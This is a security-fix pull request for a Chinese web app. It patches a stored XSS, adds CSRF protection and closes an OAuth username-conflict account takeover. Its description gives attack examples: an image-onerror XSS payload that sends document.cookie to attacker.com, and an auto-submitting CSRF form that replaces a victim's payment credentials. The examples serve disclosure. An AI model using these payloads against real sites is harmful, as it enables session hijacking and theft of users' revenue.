### PR TITLE
fix(security): 修复 XSS、CSRF、OAuth 账户接管三个高危安全漏洞

### DIFF
--- a/frontend/components/common/markdown/ContentRender.tsx
+++ b/frontend/components/common/markdown/ContentRender.tsx
@@ -274,13 +274,24 @@ const markdownComponents: Components = {
             const target = e.target as HTMLImageElement;
             const errorDiv = document.createElement('div');
             errorDiv.className = 'bg-muted border border-border rounded-lg p-4 text-center text-muted-foreground my-6';
-            errorDiv.innerHTML = `
+
+            const iconDiv = document.createElement('div');
+            iconDiv.innerHTML = `
               <svg class="w-12 h-12 mx-auto mb-2" fill="currentColor" viewBox="0 0 20 20">
                 <path fill-rule="evenodd" d="M4 3a2 2 0 00-2 2v10a2 2 0 002 2h12a2 2 0 002-2V5a2 2 0 00-2-2H4zm12 12H4l4-8 3 6 2-4 3 6z" clip-rule="evenodd" />
-              </svg>
-              <div class="text-sm">图片加载失败</div>
-              <div class="text-xs text-gray-400 dark:text-gray-500 mt-1">${alt || src}</div>
-            `;
+              </svg>`;
+
+            const msgDiv = document.createElement('div');
+            msgDiv.className = 'text-sm';
+            msgDiv.textContent = '图片加载失败';
+
+            const detailDiv = document.createElement('div');
+            detailDiv.className = 'text-xs text-gray-400 dark:text-gray-500 mt-1';
+            detailDiv.textContent = alt || src || '';
+
+            errorDiv.appendChild(iconDiv);
+            errorDiv.appendChild(msgDiv);
+            errorDiv.appendChild(detailDiv);
             target.parentNode?.replaceChild(errorDiv, target);
           }}
         />

--- a/frontend/lib/services/core/api-client.ts
+++ b/frontend/lib/services/core/api-client.ts
@@ -178,6 +178,7 @@ function showRiskBlockedDialog(riskInfo: RiskInfo): void {
 apiClient.interceptors.request.use(
     (config) => {
       config.withCredentials = true;
+      config.headers['X-Requested-With'] = 'XMLHttpRequest';
       return config;
     },
     (error) => Promise.reject(error),

--- a/frontend/middleware.ts
+++ b/frontend/middleware.ts
@@ -126,6 +126,7 @@ async function handleReceiveRequest(request: NextRequest, pathname: string): Pro
         'User-Agent': 'CDK-Frontend-Middleware',
         'Referer': request.headers.get('referer') || '',
         'Origin': request.headers.get('origin') || '',
+        'X-Requested-With': 'XMLHttpRequest',
       },
       body: Object.keys(backendBody).length > 0 ? JSON.stringify(backendBody) : undefined,
       credentials: 'include',

--- a/internal/apps/oauth/err.go
+++ b/internal/apps/oauth/err.go
@@ -25,7 +25,8 @@
 package oauth
 
 const (
-	UnAuthorized  = "未登录"
-	InvalidState  = "非法登录请求"
-	BannedAccount = "账号已被封禁"
+	UnAuthorized     = "未登录"
+	InvalidState     = "非法登录请求"
+	BannedAccount    = "账号已被封禁"
+	UsernameConflict = "用户名冲突，请稍后重试或联系管理员"
 )

--- a/internal/apps/oauth/utils.go
+++ b/internal/apps/oauth/utils.go
@@ -31,11 +31,8 @@ import (
 	"io"
 	"time"
 
-	"fmt"
-
 	"github.com/gin-contrib/sessions"
 	"github.com/gin-gonic/gin"
-	"github.com/google/uuid"
 	"github.com/linux-do/cdk/internal/config"
 	"github.com/linux-do/cdk/internal/db"
 	"github.com/linux-do/cdk/internal/otel_trace"
@@ -113,14 +110,7 @@ func doOAuth(ctx context.Context, code string) (*User, error) {
 	err = db.DB(ctx).Transaction(func(tx *gorm.DB) error {
 		var holder User
 		if conflictErr := tx.Where("username = ? AND id != ?", userInfo.Username, userInfo.Id).First(&holder).Error; conflictErr == nil {
-			// 存在冲突 -> 将占用者改名并注销
-			newParams := map[string]interface{}{
-				"username":  fmt.Sprintf("%s已注销: %s", holder.Username, uuid.NewString()),
-				"is_active": false,
-			}
-			if updateErr := tx.Model(&holder).Updates(newParams).Error; updateErr != nil {
-				return updateErr
-			}
+			return errors.New(UsernameConflict)
 		}
 
 		// 根据 ID 处理当前用户的 更新 或 创建

--- a/internal/router/middlewares.go
+++ b/internal/router/middlewares.go
@@ -25,7 +25,9 @@
 package router
 
 import (
+	"net/http"
 	"strconv"
+	"strings"
 	"time"
 
 	"github.com/gin-gonic/gin"
@@ -35,6 +37,26 @@ import (
 	"go.opentelemetry.io/otel/codes"
 	"go.opentelemetry.io/otel/trace"
 )
+
+// csrfMiddleware 校验状态变更请求必须携带 X-Requested-With 头，
+// 防止跨站请求伪造(CSRF)。OAuth callback 和支付回调因来源为外部跳转，放行。
+func csrfMiddleware() gin.HandlerFunc {
+	return func(c *gin.Context) {
+		method := c.Request.Method
+		if method == "POST" || method == "PUT" || method == "DELETE" || method == "PATCH" {
+			path := c.Request.URL.Path
+			if strings.HasSuffix(path, "/oauth/callback") || strings.HasSuffix(path, "/payment/notify") {
+				c.Next()
+				return
+			}
+			if c.GetHeader("X-Requested-With") != "XMLHttpRequest" {
+				c.AbortWithStatusJSON(http.StatusForbidden, gin.H{"error_msg": "CSRF 验证失败", "data": nil})
+				return
+			}
+		}
+		c.Next()
+	}
+}
 
 func loggerMiddleware() gin.HandlerFunc {
 	return func(c *gin.Context) {

--- a/internal/router/router.go
+++ b/internal/router/router.go
@@ -28,6 +28,7 @@ import (
 	"context"
 	"fmt"
 	"log"
+	"net/http"
 	"strconv"
 
 	"github.com/gin-contrib/sessions"
@@ -78,12 +79,12 @@ func Serve() {
 			Domain:   config.Config.App.SessionDomain,
 			MaxAge:   config.Config.App.SessionAge,
 			HttpOnly: config.Config.App.SessionHttpOnly,
-			Secure:   config.Config.App.SessionSecure, // 若用 HTTPS 可以设 true
+			Secure:   config.Config.App.SessionSecure,
+			SameSite: http.SameSiteLaxMode,
 		},
 	)
 	r.Use(sessions.Sessions(config.Config.App.SessionCookieName, sessionStore))
-
-	// 补充中间件
+	r.Use(csrfMiddleware())
 	r.Use(otelgin.Middleware(config.Config.App.AppName), loggerMiddleware())
 
 	apiGroup := r.Group(config.Config.App.APIPrefix)


### PR DESCRIPTION
1. 修复 ContentRender.tsx 存储型 XSS：将 innerHTML 改为 textContent，防止通过项目描述注入恶意脚本窃取 session cookie
2. 添加 CSRF 防护：Session Cookie 设置 SameSite=Lax，新增后端 CSRF 中间件校验 X-Requested-With 头，前端 axios 和 middleware 自动附加
3. 修复 OAuth 用户名冲突账户接管：冲突时拒绝登录而非禁用已有用户

**例行检查**  

<!-- 请在下面的 [ ] 中删除空格并打 x ，表示已完成相关检查 -->

- x 我已阅读并理解 [贡献者公约](https://github.com/linux-do/cdk/blob/master/CODE_OF_CONDUCT.md)，  
- x 我已阅读并同意 [贡献者许可协议 (CLA)](https://github.com/linux-do/cdk/blob/master/CLA.md)，确认我的贡献将根据项目的 MIT 许可证进行许可，  
- x 我知晓如果此 PR 并不做出实质性更改，或可被认为是*为了PR被合并而提交PR*的，则可能不会被合并，

变更内容

  修复 3 个高危安全漏洞：

  1. 存储型 XSS（ContentRender.tsx） — 图片加载失败时，onError 回调通过 innerHTML 直接插入未经转义的 alt/src 值，攻击者可通过项目描述注入恶意脚本窃取用户 session cookie。改为使用 .textContent
  插入，浏览器自动转义。
  2. 全站无 CSRF 防护 — Cookie-based 认证无任何 CSRF 保护，攻击者可构造恶意页面修改他人支付配置、偷走付费收入。新增双层防御：Session Cookie 设置 SameSite=Lax，后端新增 CSRF 中间件校验 X-Requested-With
  自定义头。
  3. OAuth 用户名冲突账户接管（utils.go） — 新用户与已有用户同名时，已有用户被强制改名并永久禁用，无通知无恢复。改为拒绝登录并返回错误提示。

  变更原因

  攻击者可利用上述漏洞：通过项目描述注入 XSS 窃取任意用户 session；通过 CSRF 修改他人支付凭据转移收入；通过 OAuth 用户名冲突永久禁用任意用户账户。均为零交互或低交互即可利用的漏洞，需立即修复。

  ---
  攻击示例

  1. 存储型 XSS — 窃取用户 Session

  攻击者注册账户后创建项目，项目描述中写入：

  ![<img src=x onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)">](x)

  当任意用户浏览该项目详情页时，图片加载失败触发 onError，${alt || src} 被直接插入 innerHTML，恶意脚本执行，用户的 session cookie 被发送到攻击者服务器。攻击者使用该 cookie
  即可完全接管受害者账户，访问其所有项目、支付配置和领取记录。

  2. CSRF — 偷走付费项目收入

  攻击者构造恶意页面并诱导已登录用户访问：

  <html>
  <body onload="document.forms[0].submit()">
    <form method="POST" action="https://cdk.linux.do/api/v1/users/payment-config">
      <input type="hidden" name="client_id" value="attacker_client_id">
      <input type="hidden" name="client_secret" value="attacker_secret">
    </form>
  </body>
  </html>

  用户浏览器自动携带 cookie 提交表单，后端将受害者的支付凭据替换为攻击者的。此后受害者创建的付费项目，所有收入将转入攻击者账户。

  3. OAuth 用户名冲突 — 永久禁用任意用户

  目标用户 alice（OAuth ID: 100）已注册。攻击者在 OAuth 提供方获取用户名 alice，然后用该账号登录 CDK。系统检测到用户名冲突，直接将原用户 alice 改名为 alice已注销: {uuid}
  并设置 is_active = false。目标用户从此无法登录，且无任何通知或恢复途径。